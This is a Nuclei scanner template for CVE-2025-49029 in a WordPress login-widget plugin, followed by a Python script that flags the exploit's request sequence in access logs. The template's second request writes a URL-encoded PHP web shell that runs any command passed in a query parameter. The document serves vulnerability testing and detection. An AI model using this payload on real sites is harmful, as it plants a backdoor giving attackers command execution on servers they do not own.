Vulnerability description
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0
id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution
  classification:
    epss-score: 0.00137
    epss-percentile: 0.34279
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/"
    fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/"
  tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "custom-login-and-signup-widget")
          - status_code_3 == 500
        condition: and
# digest: 4a0a00473045022100b0895bc8d9998593ea58ea191cbe56ef241e354b4f59beda3ab98c9c7be1934002200ac024d97b65abea03e546843a0b2d1efabda4b5593eaf0fb979282f0bc1ab82:922c64590222798bb761d5b6d8e72950
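From the defender's side, the template above describes a three-request sequence that leaves a recognisable trace in web-server access logs: an authenticated POST to the plugin settings page with `editbn1=yes`, followed by a GET for a `.php` file under the plugin's `content/` directory. The following Python is an added example (not part of the template, the plugin, or the Nuclei project) that correlates those two requests per client IP over access-log lines. The log lines are constructed for the example, and the Apache/nginx combined log format, the per-IP correlation and the helper names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format). The first client
# performs the sequence the template issues; the second is ordinary admin
# browsing and must not be flagged. IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jun/2025:12:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.10 - - [10/Jun/2025:12:00:02 +0000] "POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.10 - - [10/Jun/2025:12:00:03 +0000] "GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1" 500 0 "-" "curl/8.0"
198.51.100.7 - - [10/Jun/2025:12:05:00 +0000] "GET /wp-admin/options-general.php?page=custom-login-and-signup-widget HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2025:12:05:30 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Paths taken from the template; the plugin slug is the page= value it uses.
SETTINGS_PAGE = "/wp-admin/options-general.php"
PLUGIN_SLUG = "custom-login-and-signup-widget"
PLUGIN_CONTENT = "/wp-content/plugins/custom-login-and-signup-widget/content/"

# Minimal combined-log-format parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_log(text):
    """Parse access-log text into a list of event dicts, skipping unparseable lines."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "method": m["method"],
                "path": m["path"],
                "status": int(m["status"]),
            })
    return events


def is_settings_write(ev):
    """POST to the plugin settings page with editbn1=yes: the step that writes the option."""
    return (
        ev["method"] == "POST"
        and ev["path"].startswith(SETTINGS_PAGE)
        and f"page={PLUGIN_SLUG}" in ev["path"]
        and "editbn1=yes" in ev["path"]
    )


def is_content_php_fetch(ev):
    """Request for a .php file under the plugin's content/ directory (any method)."""
    path = ev["path"].split("?", 1)[0]
    return path.startswith(PLUGIN_CONTENT) and path.endswith(".php")


def find_suspicious_sequences(events):
    """Return (ip, write_event, fetch_event) tuples where one client first wrote
    the plugin settings and later requested a .php file under content/.
    Events are correlated by client IP only; no time window is applied."""
    pending = defaultdict(list)  # ip -> settings-write events seen so far
    hits = []
    for ev in events:
        if is_settings_write(ev):
            pending[ev["ip"]].append(ev)
        elif is_content_php_fetch(ev) and pending[ev["ip"]]:
            hits.append((ev["ip"], pending[ev["ip"]][-1], ev))
    return hits


if __name__ == "__main__":
    for ip, write, fetch in find_suspicious_sequences(parse_log(SAMPLE_LOG)):
        print(f"{ip}: settings write at {write['ts']} followed by "
              f"{fetch['method']} {fetch['path']} -> HTTP {fetch['status']}")
```

The correlation deliberately keys only on the template's own paths and query parameters, so it is independent of the payload encoding in the `text` field; in a real deployment you would bound the correlation by a time window and feed it from the actual log source rather than the embedded sample.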